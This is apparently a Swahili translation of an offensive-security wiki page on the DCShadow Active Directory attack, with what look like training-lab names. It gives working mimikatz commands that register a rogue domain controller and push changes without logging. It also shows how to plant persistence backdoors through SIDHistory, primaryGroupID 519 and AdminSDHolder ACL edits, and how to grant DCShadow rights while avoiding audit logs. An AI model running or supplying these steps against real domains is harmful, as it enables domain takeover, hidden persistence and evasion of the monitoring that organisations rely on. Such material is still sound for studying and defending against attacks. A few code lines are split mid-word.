DCShadow

Inajisajili Meneja wa Kikoa mpya katika AD na inatumia ku sukuma sifa (SIDHistory, SPNs...) kwenye vitu vilivyotajwa bila kuacha kumbukumbu yoyote kuhusu mabadiliko. Unahitaji privileges za DA na uwe ndani ya kikoa cha mzizi. Kumbuka kwamba ikiwa utatumia data mbaya, kumbukumbu mbaya sana zitaonekana.

Ili kufanya shambulio unahitaji mifano 2 ya mimikatz. Moja yao itaanzisha seva za RPC kwa ruhusa za SYSTEM (lazima uonyeshe hapa mabadiliko unayotaka kufanya), na mfano mwingine utatumika kusukuma thamani:

!+
!processtoken
lsadump::dcshadow /object:username /attribute:Description /value="My new description"

lsadump::dcshadow /push

Kumbuka kwamba elevate::token haitafanya kazi katika mimikatz1 session kwani hiyo iliongeza haki za thread, lakini tunahitaji kuongeza haki za mchakato. Unaweza pia kuchagua na "LDAP" kitu: /object:CN=Administrator,CN=Users,DC=JEFFLAB,DC=local

Unaweza kusukuma mabadiliko kutoka kwa DA au kutoka kwa mtumiaji mwenye ruhusa hizi za chini:

• Katika kitu cha domain:

• DS-Install-Replica (Ongeza/ondoa Replica katika Domain)

• DS-Replication-Manage-Topology (Simamia Topolojia ya Replika)

• DS-Replication-Synchronize (Sawaisha Replika)

• Kitu cha Sites (na watoto wake) katika konteina ya Configuration:

• CreateChild and DeleteChild

• Kitu cha kompyuta ambacho kimeandikishwa kama DC:

• WriteProperty (Sio Andika)

• Kitu cha lengo:

• WriteProperty (Sio Andika)

Unaweza kutumia Set-DCShadowPermissions kutoa ruhusa hizi kwa mtumiaji asiye na haki (kumbuka kwamba hii itacha baadhi ya kumbukumbu). Hii ni ya kikomo zaidi kuliko kuwa na ruhusa za DA. Kwa mfano: Set-DCShadowPermissions -FakeDC mcorp-student1 SAMAccountName root1user -Username student1 -Verbose Hii inamaanisha kwamba jina la mtumiaji student1 anapokuwa kwenye mashine mcorp-student1 ana ruhusa za DCShadow juu ya kitu root1user.

Kutumia DCShadow kuunda milango ya nyuma

lsadump::dcshadow /object:student1 /attribute:SIDHistory /value:S-1-521-280534878-1496970234-700767426-519

lsadump::dcshadow /object:student1 /attribute:primaryGroupID /value:519

#First, get the ACE of an admin already in the Security Descriptor of AdminSDHolder: SY, BA, DA or -519
(New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=Admin SDHolder,CN=System,DC=moneycorp,DC=local")).psbase.Objec tSecurity.sddl
#Second, add to the ACE permissions to your user and push it using DCShadow
lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=moneycorp,DC=local /attribute:ntSecurityDescriptor /value:<whole modified ACL>

Shadowception - Toa DCShadow ruhusa kwa kutumia DCShadow (hakuna kumbukumbu za ruhusa zilizobadilishwa)

Tunahitaji kuongeza ACEs zifuatazo na SID ya mtumiaji wetu mwishoni:

• Kwenye kituo cha eneo:

• (OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)

• (OA;;CR;9923a32a-3607-11d2-b9be-0000f87a36b2;;UserSID)

• (OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)

• Kwenye kituo cha kompyuta ya mshambuliaji: (A;;WP;;;UserSID)

• Kwenye kituo cha mtumiaji wa lengo: (A;;WP;;;UserSID)

• Kwenye kituo cha Tovuti katika kontena ya Mipangilio: (A;CI;CCDC;;;UserSID)

Ili kupata ACE ya sasa ya kitu: (New-Object System.DirectoryServices.DirectoryEntry("LDAP://DC=moneycorp,DC=loca l")).psbase.ObjectSecurity.sddl

Kumbuka kwamba katika kesi hii unahitaji kufanya mabadiliko kadhaa, si moja tu. Hivyo, katika mimikatz1 session (RPC server) tumia parameter /stack na kila mabadiliko unayotaka kufanya. Kwa njia hii, utahitaji tu /push mara moja ili kutekeleza mabadiliko yote yaliyokamatwa kwenye seva ya rogue.

Taarifa zaidi kuhusu DCShadow katika ired.team.